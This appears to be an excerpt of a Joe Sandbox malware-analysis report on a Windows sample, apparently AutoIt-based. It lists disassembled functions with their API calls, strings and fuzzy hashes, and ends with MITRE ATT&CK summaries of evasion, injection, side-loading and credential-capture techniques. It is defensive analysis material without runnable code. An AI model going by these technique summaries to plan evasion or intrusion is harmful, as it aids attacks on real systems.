Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID:
API String ID: 3894533514-0
Opcode ID: de4f3cd7325e32a44cb7c5abdf586fc9e2e9a31b3b020617849d4ce1e34e6220
Instruction ID: c8d432f25b2830cadf6994e55f8ad88d7c967c033c0ec6ede519a381c5d6de72
Opcode Fuzzy Hash: de4f3cd7325e32a44cb7c5abdf586fc9e2e9a31b3b020617849d4ce1e34e6220
Instruction Fuzzy Hash: E051BE326087C086E76E9B67A4403ED77A5F78CBC4F584116EB9A4B7B6CB38C842C701

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007E05E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 000000014007E066

Part of subcall function 00000001400CAFCC: _errno.LIBCMT ref: 00000001400CB004
Part of subcall function 00000001400CAFCC: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CB00F

Strings

0x%08X, xrefs: 000000014007E06C
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014007CCF6

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: LongWindow_errno_invalid_parameter_noinfo
String ID: 0x%08X$Memory limit reached (see #MaxMem in the help file).
API String ID: 2099978093-1054076255
Opcode ID: 49b9aaed20653e9ca980f25d2a667029c88103733370c5b75e13e890c001a026
Instruction ID: 7b30c77d0acb16f7962a54d0be12ca5f616eecbe34915ebb0da638f97de7f8c9
Opcode Fuzzy Hash: 49b9aaed20653e9ca980f25d2a667029c88103733370c5b75e13e890c001a026
Instruction Fuzzy Hash: 1A61AF32205AC485EB239F26C4153E86762F74CBE8F854212FB5D1B6FACB78C986C341

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400401A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 000000014004020D
CloseHandle.KERNEL32 ref: 00000001400402F0
free.LIBCMT ref: 000000014004030B

Strings

This variable has not been assigned a value., xrefs: 00000001400401A4
%s (%d) : ==> Warning: %s, xrefs: 00000001400401A3

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandleInfofree
String ID: %s (%d) : ==> Warning: %s$This variable has not been assigned a value.
API String ID: 3828278840-1383411024
Opcode ID: 772b751e9f597f1b8ca1c7c637dada4b4af7ad13f7dccc9e1cba28a48d79bb26
Instruction ID: 5dd38dcd4147fb481e0460c211ebc023e50a6005edf4a01bc0057a899eed3b57
Opcode Fuzzy Hash: 772b751e9f597f1b8ca1c7c637dada4b4af7ad13f7dccc9e1cba28a48d79bb26
Instruction Fuzzy Hash: 6A412736B10B6089E715DBA6D8447DD3775F708BB8F150319EE6927AE8CB74884AC740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400920DC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 0000000140092148
SelectObject.GDI32 ref: 000000014009388C
ReleaseDC.USER32 ref: 000000014009389D

Part of subcall function 0000000140097B00: SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000014008D1D8), ref: 0000000140097B6E
Part of subcall function 0000000140097B00: DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000014008D1D8), ref: 0000000140097B77

SendMessageW.USER32 ref: 000000014009399B
SendMessageW.USER32 ref: 00000001400939B7
GetClientRect.USER32 ref: 00000001400939F5
SetWindowLongW.USER32 ref: 0000000140093A1F
SendMessageW.USER32 ref: 0000000140093A41

Strings

Can't create control., xrefs: 00000001400938B0
static, xrefs: 000000014009213D

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ClientCreateDestroyIconLongObjectRectReleaseSelect
String ID: Can't create control.$static
API String ID: 95896621-3511495095
Opcode ID: 1833014ff571d9562c21aad47501b8bc12e09adb9581f1dc84a0c0d126db64ad
Instruction ID: 9ba960178aa520753aaa2b02951bb381ca6e69ef9b22ce79844fd78d01c14a21
Opcode Fuzzy Hash: 1833014ff571d9562c21aad47501b8bc12e09adb9581f1dc84a0c0d126db64ad
Instruction Fuzzy Hash: 1E31C776605B808AEB52CF26E4807D977A1F74C798F149026EF4D57B68DB38C945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400920D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00000001400920C0
SelectObject.GDI32 ref: 000000014009388C
ReleaseDC.USER32 ref: 000000014009389D
SendMessageW.USER32 ref: 000000014009399B
SendMessageW.USER32 ref: 00000001400939B7
GetClientRect.USER32 ref: 00000001400939F5
SetWindowLongW.USER32 ref: 0000000140093A1F
SendMessageW.USER32 ref: 0000000140093A41

Strings

SysLink, xrefs: 00000001400920D3
Can't create control., xrefs: 00000001400938B0

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ClientCreateLongObjectRectReleaseSelect
String ID: Can't create control.$SysLink
API String ID: 2656910855-3028581624
Opcode ID: 9e70f8a7f5955ff780346c5fbb48bf70468a891e7bc55df200acd81a044c9cbe
Instruction ID: 6e019788fd84dec84cc4dd4b38ea06d0ef5a717ad49a4d22eb47257a96f5e33a
Opcode Fuzzy Hash: 9e70f8a7f5955ff780346c5fbb48bf70468a891e7bc55df200acd81a044c9cbe
Instruction Fuzzy Hash: B721F576615B448AEB52CF2AE8807D973A0F74C798F145026EF8D97B78DB38C985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140092072 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00000001400920C0
SelectObject.GDI32 ref: 000000014009388C
ReleaseDC.USER32 ref: 000000014009389D
SendMessageW.USER32 ref: 000000014009399B
SendMessageW.USER32 ref: 00000001400939B7
GetClientRect.USER32 ref: 00000001400939F5
SetWindowLongW.USER32 ref: 0000000140093A1F
SendMessageW.USER32 ref: 0000000140093A41

Strings

Can't create control., xrefs: 00000001400938B0
static, xrefs: 0000000140092072

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ClientCreateLongObjectRectReleaseSelect
String ID: Can't create control.$static
API String ID: 2656910855-3511495095
Opcode ID: 66ac87cc029eebdddeeedf784189bc13659f2cbb764c7a9fdb9b0023495c5a5d
Instruction ID: 4b71c5653b93e6eddc4df025a45b7ab28ab1c10484b6187c656b0d2932efa0bf
Opcode Fuzzy Hash: 66ac87cc029eebdddeeedf784189bc13659f2cbb764c7a9fdb9b0023495c5a5d
Instruction Fuzzy Hash: 15210676615B448AEB52CF2AE8807D973A0F74C7A4F145026EF4D97B78DB38C985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140006180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,0000000140006125), ref: 00000001400061A8
GlobalLock.KERNEL32 ref: 00000001400061E1
GlobalFree.KERNEL32 ref: 00000001400061F4

Strings

GlobalAlloc, xrefs: 00000001400061BE
GlobalLock, xrefs: 0000000140006201

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFreeLock
String ID: GlobalAlloc$GlobalLock
API String ID: 1811133220-3672399903
Opcode ID: 9593341c33376db10766d63edea85d641170a012fe00d1c6813a9162e5f944b3
Instruction ID: d12fda554cb3d94aa79ec9b1b9f7a6216919f67dbf5acb5e7c779fa3446c4a0a
Opcode Fuzzy Hash: 9593341c33376db10766d63edea85d641170a012fe00d1c6813a9162e5f944b3
Instruction Fuzzy Hash: D4115EB1601B4191EF4ACF2AF4953D863A0EB5CBD4F489026EB0D57375EE38C995C780

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AA0A0 Relevance: 7.6, APIs: 5, Instructions: 70registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32 ref: 00000001400AA0DD
RegOpenKeyExW.ADVAPI32 ref: 00000001400AA11D

Part of subcall function 00000001400AA0A0: RegCloseKey.ADVAPI32 ref: 00000001400AA144
Part of subcall function 00000001400AA0A0: RegDeleteKeyW.ADVAPI32 ref: 00000001400AA156
Part of subcall function 00000001400AA0A0: RegEnumKeyExW.ADVAPI32 ref: 00000001400AA19B

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Enum$CloseDeleteOpen
String ID:
API String ID: 2095303065-0
Opcode ID: 546bb3373a8f0290214174c265ea9e279252af0e1408538725f9ccb342efc901
Instruction ID: 504be43b3127dba2f9b47c61f08bd24f5020da245fa7b72fac9fca584a0f172e
Opcode Fuzzy Hash: 546bb3373a8f0290214174c265ea9e279252af0e1408538725f9ccb342efc901
Instruction Fuzzy Hash: 1031F132214B9592E7618B66F4847DA73A5F7897D4F500121FB8D43EA4DF3DC99ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014009E0F0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 000000014009E17C
GetWindowRect.USER32 ref: 000000014009E194
GetWindowRect.USER32 ref: 000000014009E1A3
IntersectRect.USER32 ref: 000000014009E1B8

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Rect$Window$IntersectParent
String ID:
API String ID: 3824346474-0
Opcode ID: 5331388bf6f54e97ffa5753d18a2fd0d68cc5592d2723d78bbfdf08a36391670
Instruction ID: cc53a2a2c464ed8d33cf859a3762bb955268bb4e042470fb12445535b6a3f622
Opcode Fuzzy Hash: 5331388bf6f54e97ffa5753d18a2fd0d68cc5592d2723d78bbfdf08a36391670
Instruction Fuzzy Hash: C53193336186819ADB62CF36E44079AB7A1F789BC4F044301FB8957AB9DB38DD52CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A2160 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SetMenuItemInfoW.USER32 ref: 00000001400A22AE

Part of subcall function 00000001400A2330: malloc.LIBCMT ref: 00000001400A236C
Part of subcall function 00000001400A2330: free.LIBCMT ref: 00000001400A2388

Strings

P, xrefs: 00000001400A21EA

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: InfoItemMenufreemalloc
String ID: P
API String ID: 2847912382-3110715001
Opcode ID: 900013ece33a90f1785eaaf89873bcf3af1dac05ebb2df9192d03fc9a62ee6fa
Instruction ID: 4d32ff928648402c52d8367afeadc000094e855469fe6d8f7da8d66d94738236
Opcode Fuzzy Hash: 900013ece33a90f1785eaaf89873bcf3af1dac05ebb2df9192d03fc9a62ee6fa
Instruction Fuzzy Hash: 2E51923230165086EB6A9B2BA4107AE62A1F79DBD4F144335FF5A07BE5DB39C981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140028150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 00000001400282FC

Strings

{, xrefs: 00000001400281B4
This line does not contain a recognized action., xrefs: 00000001400282D2

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: wcsncpy
String ID: This line does not contain a recognized action.${
API String ID: 322933527-101845141
Opcode ID: 6aa794c3f2c9ad134c660cadde4b1b398e06ef199636e0e14275ce214c07eda0
Instruction ID: 1c2ce6a0c463966874f6d5257edbea0aa455576167841a736ff4c886dd4ffaef
Opcode Fuzzy Hash: 6aa794c3f2c9ad134c660cadde4b1b398e06ef199636e0e14275ce214c07eda0
Instruction Fuzzy Hash: F541E52971969086E7708F56E10036A7261EB5CBD4F44221AFF99C7BE8E73DC901C709

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B40F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 00000001400B410F
GetClassNameW.USER32 ref: 00000001400B4138

Strings

#32770, xrefs: 00000001400B4143

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: ClassNameProcessThreadWindow
String ID: #32770
API String ID: 2910564809-463685578
Opcode ID: 3535a92801cd5c384f442ac5a97c48c2b42de6770fe99d5a95370b0049eafd43
Instruction ID: 2a0b2f788977aea3b433878f58722216e345999e9635defa57f86d50f4b85747
Opcode Fuzzy Hash: 3535a92801cd5c384f442ac5a97c48c2b42de6770fe99d5a95370b0049eafd43
Instruction Fuzzy Hash: 3F010072604A84D6EB628F59E4443AA73B5F398BC8F584111EB8C57A68DF3CD9D5CB00

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

